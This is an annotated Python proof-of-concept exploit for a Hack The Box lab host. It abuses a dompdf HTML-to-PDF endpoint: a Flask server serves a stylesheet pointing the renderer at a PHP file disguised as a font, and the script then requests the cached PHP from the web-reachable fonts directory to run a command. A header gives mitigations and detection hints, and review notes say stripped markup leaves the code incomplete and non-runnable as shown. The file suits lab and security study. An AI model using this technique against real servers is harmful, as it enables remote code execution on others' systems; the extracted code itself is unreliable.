# Proof-of-concept script (HTB "Interface" lab host, per the hostnames below)
# that abuses an HTML-to-PDF endpoint backed by dompdf: it serves a stylesheet
# whose @font-face points at a PHP file disguised as a font, lets the renderer
# fetch and cache it, then requests the cached copy from the fonts directory.
#
# Defender's view: the attack surface is a server-side renderer that fetches
# remote stylesheets/fonts and writes them, with a derived filename, into a
# web-reachable directory where PHP executes. Mitigations: disallow remote
# resource loading in the PDF renderer, keep dompdf updated, deny script
# execution inside the fonts/cache directory. Detection: outbound requests
# from the renderer to untrusted hosts for .css/.php "fonts", and GETs for
# vendor/dompdf/dompdf/lib/fonts/*.php in the web server logs.
#
# NOTE(review): this listing was extracted with all <...> markup stripped —
# the route converters, the HTML in `data`, and possibly the template are
# incomplete (see notes below); the code as shown would not run as-is.
import hashlib
import os
import subprocess
import sys
import time
from flask import Flask, Response
import requests, base64
import random
from threading import Thread

app = Flask(__name__)

# Bytes of the "font" served to the renderer (read from a local template file).
ttf = b""
# md5 of the font URL; set by css() and read later by the main thread.
md5 = ""
with open("exploit_font_template.php", "rb") as file:
    ttf = file.read()
# Command from argv; in this script it is only ever printed (in exploit()).
# How it reaches the target is not visible here — presumably via the template.
cmd = sys.argv[1].encode()
#print(ttf + b"")
#exit()

# Flags flipped by the Flask thread and polled by the main thread. They are
# plain module globals with no synchronisation (works only because of the GIL
# and the busy-wait below).
got_php = False
got_css = False
# The POST to the target is sent through a local proxy on 127.0.0.1:8080,
# presumably an intercepting proxy used to inspect the traffic — confirm.
proxy = {'http':'http://127.0.0.1:8080'}


@app.route('/css/')
def css(name):
    """Serve a stylesheet whose @font-face src points at the PHP "font" URL.

    NOTE(review): the route has no URL variable but the view takes `name`;
    a `<name>` converter was most likely lost in extraction. As written,
    Flask would call css() with no arguments and the request would 500.
    """
    global md5,got_css
    got_css = True
    # Random suffix so each run yields a distinct URL and hence a distinct
    # cached filename (the md5 below is what the main thread later requests).
    url = f"http://10.10.16.47/exploit/exploit_font{random.randint(0,9999)}.php"
    md5 = hashlib.md5(url.encode()).hexdigest()
    return Response("""@font-face { font-family:'exploitfont'; src:url('""" + url + """'); font-weight:'normal'; font-style:'normal'; }""")


@app.route('/exploit/')
def exploit(name):
    """Serve the template bytes as the "font" and mark that the fetch happened.

    NOTE(review): same missing URL variable as css(); `name` is never used.
    """
    global ttf, got_php
    got_php = True
    print(f"cmd = {cmd}")
    # `+ b""` is a no-op concatenation; the template is returned unchanged.
    return ttf + b""


class Server(Thread):
    """Thread that runs the Flask app so the main thread can drive the target."""
    port = 80
    cmd = b''

    # NOTE(review): `__int__` is a typo for `__init__`, so this never runs.
    # Harmless here: Thread.__init__ is still called by the implicit default.
    def __int__(self):
        super(Server, self).__init__()

    def setIP(self, ip):
        self.ip = ip

    def setPort(self, port):
        # Caller below passes the string "80"; relies on Flask accepting a
        # str port — confirm for the Flask version in use.
        self.port = port

    def setServerObject(self, obj):
        self.app = obj

    def run(self) -> None:
        # Exceptions are only printed; the main thread has no way to learn
        # that the listener failed (e.g. port 80 needing privileges).
        try:
            self.app.run(host=self.ip, port=self.port)
        except Exception as e:
            print(f"exception: {e}")


# Silence werkzeug's per-request access log lines.
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)

if __name__ == '__main__':
    # NOTE(review): the HTML payload is empty here; the markup that referenced
    # the /css/ stylesheet was evidently stripped during extraction.
    data = {"html":f""}
    server = Server()
    server.setIP("10.10.16.47")
    server.setPort("80")
    server.setServerObject(app)
    server.start()
    # Fixed delay instead of a readiness check for the listener.
    time.sleep(0.5)
    requests.post("http://prd.m.rendering-api.interface.htb/api/html2pdf", json=data, proxies=proxy)
    # Busy-wait (100% CPU, no timeout) until the renderer has fetched the "font".
    while not got_php:
        pass
    # dompdf caches the fetched font under a name derived from the md5 of its
    # URL; that cached .php is what is requested here.
    r = requests.get(f'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_{md5}.php')
    # Skips the first 440 chars of the response, presumably the template
    # prefix before the interesting output — offset is unexplained.
    print(r.text[440:])
    # The non-daemon Flask thread would keep the process alive, so the script
    # kills its own PID to exit.
    subprocess.call(['kill', str(os.getpid())])